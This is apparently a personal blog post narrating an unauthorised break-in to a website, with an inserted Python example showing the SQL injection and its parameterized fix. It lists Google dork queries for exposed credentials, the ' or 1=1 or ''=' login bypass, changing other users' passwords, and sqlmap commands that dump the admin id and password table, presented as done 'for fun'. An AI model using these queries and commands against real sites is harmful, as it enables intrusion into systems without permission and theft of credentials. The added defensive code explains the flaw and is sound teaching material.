This article records how I hacked a website.
DON’T DO ANYTHING BAD!
1. Gathering as much information as possible
Google is a very useful tool; making good use of Google hacking can yield twice the result with half the effort. Some useful query patterns are as follows:
site:xxxx.com filetype:txt intext:username and password
site:baidu.com -site:www.baidu.com -site:video.baidu.com // "-" means exclude
site:xxx.net intext:login
site:a2.xxxx.com inurl:file
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:xxxx.com intitle:管理
I found a target by using:
It was an admin login page. Next we need to find the website's IP; there are usually two ways:
Next, use nmap to find more info about this website:
Only port 80 was open. In general, more open ports mean more potential security vulnerabilities. For this website, we can only attack its HTTP server.
Entering admin' in the input box returned this page:
This means the website has a SQL injection vulnerability.
Then use Burp Suite to run some basic tests:
I found an interesting test result: the string ' or 1=1 or ''=' returns a response of a different length. Testing this string:
Wow~ successful login! We can modify other users' passwords:
But... that's not the end.
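Why the two inputs above behave as they do, and the fix, as an added example that is not part of the original write-up or the site's code. It assumes the login page builds its query by string concatenation; Python's sqlite3 stands in for the site's database, the table and column names are taken from the sqlmap output later in this article, and the stored password is constructed.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the site's table; the stored password is made up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE adminid (id TEXT PRIMARY KEY, passwd TEXT)")
    db.execute("INSERT INTO adminid VALUES ('admin', 's3cret-constructed')")
    return db

def login_concatenated(db, user, passwd):
    # Assumed vulnerable pattern: input is pasted into the SQL text, so a
    # quote in `user` ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT id FROM adminid WHERE id = '" + user +
           "' AND passwd = '" + passwd + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, user, passwd):
    # Fix: placeholders bind the input as data; it is never parsed as SQL.
    sql = "SELECT id FROM adminid WHERE id = ? AND passwd = ?"
    return db.execute(sql, (user, passwd)).fetchone() is not None

def outcome(login, db, user, passwd):
    # Map a login attempt to what the visitor would observe.
    try:
        return "accepted" if login(db, user, passwd) else "rejected"
    except sqlite3.Error:
        # The admin' probe leaves an unbalanced quote; a page that echoes
        # this error is what revealed the injection point.
        return "sql error"

if __name__ == "__main__":
    db = make_db()
    inputs = ["admin'", "' or 1=1 or ''='", "admin"]  # strings from the article
    for user in inputs:
        pw = "s3cret-constructed" if user == "admin" else "x"
        for fn in (login_concatenated, login_parameterized):
            print(f"{fn.__name__:22} {user!r:22} -> {outcome(fn, db, user, pw)}")
```

With the parameterized query both test strings are simply rejected as unknown users, and no database error reaches the visitor.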
3. Further penetration testing
Save the POST request to post.txt through Burp's proxy, and call up sqlmap:
sqlmap -r post.txt -p id --risk=3 --dbs
Boom… found its table name: adminid. Continue:
sqlmap -r post.txt -p id --columns -T adminid
sqlmap -r post.txt -p id --dump -T adminid -C "id,passwd"
Haha.. the admin's id and password were out~
It's just for fun; please don't do anything bad~!